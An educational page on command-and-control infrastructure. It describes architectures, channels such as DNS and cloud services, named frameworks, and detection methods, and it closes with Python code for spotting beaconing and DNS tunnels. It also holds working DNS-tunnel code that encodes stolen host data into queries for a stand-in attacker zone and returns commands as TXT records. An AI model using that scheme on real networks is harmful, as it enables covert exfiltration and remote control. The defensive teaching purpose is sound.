
C2 (Command and Control)

Infrastructure and communications channels used by attackers to maintain contact with and control compromised systems.

What is C2?

Command and Control (C2, C&C) refers to the infrastructure, protocols, and techniques an attacker uses to communicate with and control compromised systems after initial access. Over the C2 channel the attacker tasks implants with commands, collects their output, stages additional tooling, exfiltrates data, and keeps access for as long as the channel survives. Because almost every stage of an intrusion after the foothold depends on this channel, it is one of the best places to detect and disrupt an attack.

C2 Architecture Types

Centralized:

  • A single server (often one team server behind a few disposable redirectors) controls all infected hosts
  • Simple to operate, but a single point of failure
  • Easier to enumerate, block, and take down once the server or its redirectors are identified

Peer-to-Peer (P2P):

  • Infected hosts relay commands among themselves; only a few ever contact the operator directly
  • Resilient to takedowns and blocklists, since there is no fixed server to seize
  • Complex to manage, and commands typically have to be signed so that a defender cannot inject their own into the mesh

Hybrid:

  • Combination of approaches, for example P2P among hosts with a small tier of centralized servers
  • Balances resilience and manageability

C2 Communication Methods

  • HTTP/HTTPS: Blends with ordinary web traffic; beacons mimic common user agents, URIs, and TLS configurations, often behind redirectors or CDN fronting
  • DNS: Tunnels data through DNS queries; the implant encodes data into subdomain labels of a zone the attacker controls, and tasking comes back in the answer (TXT, A, or CNAME records). It works even where only DNS is allowed outbound, but is low-bandwidth and noisy
  • Social Media: Platforms used as dead drops; a public post or profile carries the encoded address of the real server, so the implant never hard-codes it
  • Cloud Services: Attacker-controlled accounts on trusted SaaS (storage, messaging, code hosting) so traffic goes to domains that are already allowed and already encrypted
  • Custom Protocols: Encrypted proprietary channels over raw TCP or UDP; harder to inspect, but easier to spot because the traffic matches no known protocol on that port
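To make the DNS method concrete, here is an added example, not code from this page or from any C2 framework, of how an implant and an attacker's authoritative server exchange data through ordinary DNS lookups. The zone c2.example, the session id, the chunk sizes, and the sample implant output are all assumptions chosen for illustration. Base32 is used because DNS labels are case-insensitive and limited to 63 characters, and the full name to 253.

```python
"""Toy DNS-tunnel encoder/decoder (added example, not a real C2 tool).

Upstream: the implant encodes data into subdomain labels of a query for an
attacker-controlled zone. Any recursive resolver forwards the query to that
zone's authoritative server, which reassembles the payload.
Downstream: the server answers with a TXT record carrying the next command.
"""
from __future__ import annotations

import base64

ZONE = "c2.example"      # hypothetical attacker-controlled authoritative zone
SESSION = "a7f3"         # hypothetical per-implant session id
CHUNK = 30               # 30 raw bytes -> 48 base32 chars, under the 63-char label limit
LABELS_PER_QUERY = 3     # up to 90 payload bytes per query; name stays well under 253 chars


def b32(data: bytes) -> str:
    """DNS-safe encoding: base32 survives case folding; padding is dropped."""
    return base64.b32encode(data).decode().rstrip("=").lower()


def unb32(text: str) -> bytes:
    """Restore the padding base32 needs and decode."""
    return base64.b32decode(text.upper() + "=" * (-len(text) % 8))


def encode_upstream(payload: bytes, zone: str = ZONE, session: str = SESSION) -> list[str]:
    """Implant side: split a payload into an ordered list of query names.

    Name layout: <seq>.<session>.<data>[.<data>...].<zone>
    """
    labels = [b32(payload[i:i + CHUNK]) for i in range(0, len(payload), CHUNK)]
    names = []
    for seq, i in enumerate(range(0, len(labels), LABELS_PER_QUERY)):
        name = ".".join([str(seq), session, *labels[i:i + LABELS_PER_QUERY], zone])
        # RFC 1035 limits: 63 chars per label, 253 for the whole name
        assert len(name) <= 253 and max(len(l) for l in name.split(".")) <= 63
        names.append(name)
    return names


def decode_upstream(names: list[str], zone: str = ZONE) -> dict[str, bytes]:
    """Authoritative server side: reassemble each session's payload.

    Queries can arrive out of order or duplicated (retries, several
    resolvers), so chunks are keyed by seq and joined in seq order.
    """
    per_session: dict[str, dict[int, bytes]] = {}
    suffix = "." + zone
    for name in names:
        if not name.endswith(suffix):
            continue                      # not our zone: ignore
        seq, session, *data = name[: -len(suffix)].split(".")
        chunk = b"".join(unb32(label) for label in data)
        per_session.setdefault(session, {})[int(seq)] = chunk
    return {s: b"".join(c[k] for k in sorted(c)) for s, c in per_session.items()}


def build_txt_answer(command: bytes) -> str:
    """Server side: the next tasking rides back as the TXT record data."""
    return b32(command)


def read_txt_answer(txt: str) -> bytes:
    """Implant side: decode the tasking from the TXT answer."""
    return unb32(txt)


if __name__ == "__main__":
    out = b"user=svc_backup host=FS01 os=Windows\n"   # constructed implant output
    queries = encode_upstream(out)
    for q in queries:
        print("Q", q)
    print("server reassembled:", decode_upstream(queries)[SESSION])
    print("A TXT", build_txt_answer(b"ls C:\\Users"))
```

The upstream side is what a defender can see even when the content is encrypted: every payload produces a burst of unique, long, high-entropy subdomains under one zone, which is the signature DNS anomaly detection keys on. Real tunnelling tools add encryption, compression, and acknowledgements on top of this layout; none of that changes the observable shape.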

C2 Frameworks

  • Cobalt Strike (commercial)
  • Metasploit (open source)
  • Empire (open source)
  • Sliver (open source)
  • Covenant (open source)

Detecting C2

  • Monitor for beaconing patterns: the same host reaching the same destination at near-regular intervals with similar request sizes; jitter widens the distribution but does not remove it
  • Analyze DNS query anomalies: many unique, long, high-entropy subdomains under one zone, unusual record types (TXT, NULL), and queries for domains never resolved on the network before
  • Inspect encrypted traffic metadata: TLS fingerprints (JA3/JA3S), certificate subject, issuer, and validity, SNI, and packet sizes and timing, none of which requires decryption
  • Watch for unusual outbound connections: new or rare destinations, servers that should never talk outbound, and ports that do not match the protocol running on them
  • Deploy network detection tools such as Zeek, Suricata, and RITA, and correlate their output with endpoint telemetry so a flagged connection can be tied to the process that opened it
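The first two detections above, run over constructed Zeek-style log lines as an added example that is not code from this page or from any detection product: a beacon detector that scores the regularity of connection intervals per flow, and a DNS tunnel detector that scores each zone by the subdomains queried beneath it. The log lines, hosts, zone names, and thresholds are all invented for illustration; the thresholds are starting points to tune against your own traffic.

```python
"""Beaconing and DNS-tunnel detection over constructed log lines (added example)."""
import math
import statistics
from collections import Counter, defaultdict

# Constructed conn.log-style lines (ts, src, dst, dport). 10.0.0.15 beacons
# every ~60 s with a few seconds of jitter; 10.0.0.22 is a person browsing.
CONN_LOG = """\
1700000000\t10.0.0.15\t203.0.113.7\t443
1700000060\t10.0.0.15\t203.0.113.7\t443
1700000121\t10.0.0.15\t203.0.113.7\t443
1700000180\t10.0.0.15\t203.0.113.7\t443
1700000240\t10.0.0.15\t203.0.113.7\t443
1700000302\t10.0.0.15\t203.0.113.7\t443
1700000362\t10.0.0.15\t203.0.113.7\t443
1700000420\t10.0.0.15\t203.0.113.7\t443
1700000480\t10.0.0.15\t203.0.113.7\t443
1700000000\t10.0.0.22\t198.51.100.9\t443
1700000003\t10.0.0.22\t198.51.100.9\t443
1700000143\t10.0.0.22\t198.51.100.9\t443
1700000150\t10.0.0.22\t198.51.100.9\t443
1700000560\t10.0.0.22\t198.51.100.9\t443
1700000562\t10.0.0.22\t198.51.100.9\t443
1700000574\t10.0.0.22\t198.51.100.9\t443
1700000669\t10.0.0.22\t198.51.100.9\t443
"""

# Constructed dns.log-style lines (ts, src, query). The first zone receives
# tunnel-style queries (long base32 labels); the second is ordinary browsing.
DNS_LOG = """\
1700000010\t10.0.0.15\t0.a7f3.nbswy3dpeb3w64tmmqqhe2lomvzsa3lfonzwc4tfoqqhe2lo.c2.example
1700000011\t10.0.0.15\t1.a7f3.mfrgg2lumvzsayjamvxgg33emlxgkzlzebqw4zbamvsxi5ls.c2.example
1700000012\t10.0.0.15\t2.a7f3.knuxk4ddovzzs4zzk5twozlfozwgs4ztknzxizdloy2dq6ds.c2.example
1700000013\t10.0.0.15\t3.a7f3.ebxgs43jnvqxizlemfwgsyjanvqxe3dfoqqgcylhmvzs44dr.c2.example
1700000020\t10.0.0.22\twww.example.org
1700000021\t10.0.0.22\tcdn.example.org
1700000022\t10.0.0.22\tmail.example.org
1700000023\t10.0.0.22\tapi.example.org
"""


def parse_conn(log):
    """Parse tab-separated (ts, src, dst, dport) rows, skipping comments."""
    rows = []
    for line in log.splitlines():
        if line and not line.startswith("#"):
            ts, src, dst, dport = line.split("\t")
            rows.append((float(ts), src, dst, int(dport)))
    return rows


def find_beacons(rows, min_conns=8, max_cv=0.25):
    """Flag (src, dst, dport) flows whose inter-arrival times are regular.

    cv = stdev/mean of the gaps: 0 for a fixed sleep, about 0.06 for a
    20% jitter, about 0.19 for 50% jitter, and well above 1 for human use.
    """
    by_flow = defaultdict(list)
    for ts, src, dst, dport in rows:
        by_flow[(src, dst, dport)].append(ts)
    hits = {}
    for flow, stamps in by_flow.items():
        if len(stamps) < min_conns:
            continue                      # too few samples to call it periodic
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        mean = statistics.fmean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        if cv <= max_cv:
            hits[flow] = {"connections": len(stamps), "period_s": round(mean, 1), "cv": round(cv, 3)}
    return hits


def shannon(s):
    """Shannon entropy in bits per character."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def find_dns_tunnels(log, min_unique=4, min_len=30, min_entropy=3.5):
    """Score each zone by the subdomains queried beneath it.

    Zone = last two labels, a simplification (real tooling uses the public
    suffix list). Tunnels show many unique, long, high-entropy subdomains.
    """
    subs = defaultdict(set)
    for line in log.splitlines():
        if line and not line.startswith("#"):
            _, _, query = line.split("\t")
            labels = query.lower().rstrip(".").split(".")
            if len(labels) >= 3:
                subs[".".join(labels[-2:])].add(".".join(labels[:-2]))
    hits = {}
    for zone, names in subs.items():
        if len(names) < min_unique:
            continue
        mean_len = statistics.fmean([len(n) for n in names])
        mean_ent = statistics.fmean([shannon(n) for n in names])
        if mean_len >= min_len and mean_ent >= min_entropy:
            hits[zone] = {"unique_subdomains": len(names), "mean_len": round(mean_len, 1), "mean_entropy": round(mean_ent, 2)}
    return hits
```

On the constructed data the 10.0.0.15 flow is flagged with a 60 s period and a cv near 0.02, while the browsing flow and example.org are not. In production the main source of false positives is legitimate periodic traffic (update checks, NTP, monitoring agents, mail clients polling), so allowlist known destinations and require a minimum observation window before alerting; the DNS detector should be fed with queries aggregated per zone over hours, not single lookups.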